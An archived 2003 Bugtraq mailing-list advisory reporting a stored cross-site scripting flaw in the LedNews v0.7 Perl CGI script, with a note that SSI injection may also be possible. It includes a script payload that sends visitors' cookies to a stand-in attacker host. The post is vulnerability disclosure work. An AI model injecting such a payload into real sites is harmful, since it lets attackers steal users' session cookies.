lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 15 Jun 2003 18:35:28 +0000
From: "gilbert vilvoorde" <gilbert_vilvoorde@...mail.com>
To: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com
Subject: XSS Vulnerability in LedNews (CGI/Perl) v0.7


XSS Vulnerability in LedNews (CGI/Perl) v0.7

URL: http://www.ledscripts.com/index.php?page=free:perl:lednews

Description
=======

LedNews is a CGI application written entirely in perl. Its designed to be as 
simple as possible, but very powerful at the same thing.

Vulnerability
========

The script does not attempt to filter out javascript or any other HTML tags. 
So the posting message :

<script>
document.location.replace('http://evil-haxor.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>

as news will send cookies to your CGI script.

P.S.:
It may also be possible to put SSI tags in news posts, since the script does 
not seem to do the usual filtering for them. I did not test this because i'm 
to lazy to install SSI on my system.

About me
=======

I'm gilbert from Team UEC. I'm 16 years old.
I dream about a job in security someday.
This is my first time posting a vulnerability.
I can always be contacted at gilbert_vilvoorde@...mail.com

Thank you for reading this and have a nice day,

Gilbert

_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
http://join.msn.com/?page=features/junkmail



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ